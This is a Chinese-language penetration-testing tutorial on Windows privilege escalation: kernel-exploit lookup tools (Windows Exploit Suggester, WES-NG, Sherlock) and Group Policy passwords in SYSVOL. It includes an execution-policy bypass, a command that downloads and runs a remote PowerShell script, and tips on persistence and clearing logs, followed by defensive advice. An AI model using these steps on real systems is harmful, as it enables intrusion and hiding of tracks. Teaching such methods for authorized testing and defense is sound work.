内网渗透测试 | 如何在内网中提升权限
字数 1187 2025-08-10 09:43:36

内网渗透测试:内网权限提升技术详解

一、内核溢出漏洞提权

1. 原理概述

内核溢出漏洞提权利用Windows系统中未打补丁的内核溢出漏洞进行攻击。攻击者通过超出常规长度的字符填满内存区地址,这些过量字符可能作为可执行代码运行,绕过安全措施。

2. 手动查找系统潜在漏洞

步骤1:检查当前用户权限

whoami /groups
  • 中等权限显示为"Medium Mandatory Level"
  • 此权限无法执行添加用户等操作

步骤2:查询系统补丁信息

方法一:

systeminfo

方法二:

wmic qfe get caption,description,hotfixid,installedon

步骤3:查询未修复内核漏洞

使用在线资源查询补丁对应的内核漏洞:

  • http://blog.neargle.com/win-powerup-exp-index/
  • https://i.hacking8.com/tiquan/

步骤4:执行EXP

根据系统版本(如Winserver2003)寻找对应版本的EXP并尝试执行

3. 自动查询工具

Windows Exploit Suggester

工具地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester

使用步骤:

  1. 更新漏洞库:
python2 windows-exploit-suggester.py --update
  1. 从目标机导出补丁信息:
systeminfo >1.txt
  1. 分析漏洞:
python2.7 windows-exploit-suggester.py --database 2023-10-13-mssb.xls --systeminfo 1.txt

环境要求:

  • Python 2.7环境
  • 安装xlrd 1.2.0:
python2.7 -m pip install xlrd==1.2.0

WES-NG(升级版)

工具地址:https://github.com/bitsadmin/wesng

使用步骤:

  1. 更新漏洞库:
python wes.py --update
  1. 分析漏洞:
python .\wes.py .\1.txt

Sherlock工具

PowerShell脚本工具,地址:https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1

使用方法:

  1. 绕过执行策略:
powershell.exe -exec bypass
  1. 导入并执行脚本:
Import-Module ./Sherlock.ps1
Find-AllVunlns
  1. 远程导入方式:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

结果解读:
"Appears Vulnerable"表示存在漏洞

二、组策略提权

1. 原理

当域管理员使用组策略配置密码时:

  1. 密码会被保存到共享文件夹\SYSVOL下
  2. SYSVOL文件夹对所有经过身份验证的域用户可读
  3. 保存的密码使用AES 256加密,但密钥公开

2. 利用步骤

  1. 访问组策略对象存储位置:
C:\Windows\SYSVOL\domain\Policies

  1. 查找包含密码策略的GPO对象

  2. 解密获取的密码凭据

3. 示例场景

  1. 管理员创建名为"test"的GPO对象
  2. 在用户配置中新建本地用户
  3. 重命名Administrator并设置密码(如Qq123456)
  4. 密码信息会存储在SYSVOL下的策略文件夹中

三、关键注意事项

  1. 补丁对比:准确对比已安装补丁与已知漏洞的关系
  2. EXP选择:严格匹配目标系统版本和架构
  3. 权限维持:提权成功后建立持久化访问
  4. 隐蔽性:注意清除操作日志和痕迹
  5. 法律合规:仅在授权范围内进行测试

四、防御建议

  1. 及时安装安全补丁
  2. 限制SYSVOL目录的访问权限
  3. 避免在组策略中直接配置密码
  4. 实施最小权限原则
  5. 监控异常进程和权限变更
内网渗透测试:内网权限提升技术详解 一、内核溢出漏洞提权 1. 原理概述 内核溢出漏洞提权利用Windows系统中未打补丁的内核溢出漏洞进行攻击。攻击者通过超出常规长度的字符填满内存区地址,这些过量字符可能作为可执行代码运行,绕过安全措施。 2. 手动查找系统潜在漏洞 步骤1:检查当前用户权限 中等权限显示为"Medium Mandatory Level" 此权限无法执行添加用户等操作 步骤2:查询系统补丁信息 方法一: 方法二: 步骤3:查询未修复内核漏洞 使用在线资源查询补丁对应的内核漏洞: http://blog.neargle.com/win-powerup-exp-index/ https://i.hacking8.com/tiquan/ 步骤4:执行EXP 根据系统版本(如Winserver2003)寻找对应版本的EXP并尝试执行 3. 自动查询工具 Windows Exploit Suggester 工具地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester 使用步骤: 更新漏洞库: 从目标机导出补丁信息: 分析漏洞: 环境要求: Python 2.7环境 安装xlrd 1.2.0: WES-NG(升级版) 工具地址:https://github.com/bitsadmin/wesng 使用步骤: 更新漏洞库: 分析漏洞: Sherlock工具 PowerShell脚本工具,地址:https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1 使用方法: 绕过执行策略: 导入并执行脚本: 远程导入方式: 结果解读: "Appears Vulnerable"表示存在漏洞 二、组策略提权 1. 原理 当域管理员使用组策略配置密码时: 密码会被保存到共享文件夹\SYSVOL下 SYSVOL文件夹对所有经过身份验证的域用户可读 保存的密码使用AES 256加密,但密钥公开 2. 利用步骤 访问组策略对象存储位置: 查找包含密码策略的GPO对象 解密获取的密码凭据 3. 示例场景 管理员创建名为"test"的GPO对象 在用户配置中新建本地用户 重命名Administrator并设置密码(如Qq123456) 密码信息会存储在SYSVOL下的策略文件夹中 三、关键注意事项 补丁对比 :准确对比已安装补丁与已知漏洞的关系 EXP选择 :严格匹配目标系统版本和架构 权限维持 :提权成功后建立持久化访问 隐蔽性 :注意清除操作日志和痕迹 法律合规 :仅在授权范围内进行测试 四、防御建议 及时安装安全补丁 限制SYSVOL目录的访问权限 避免在组策略中直接配置密码 实施最小权限原则 监控异常进程和权限变更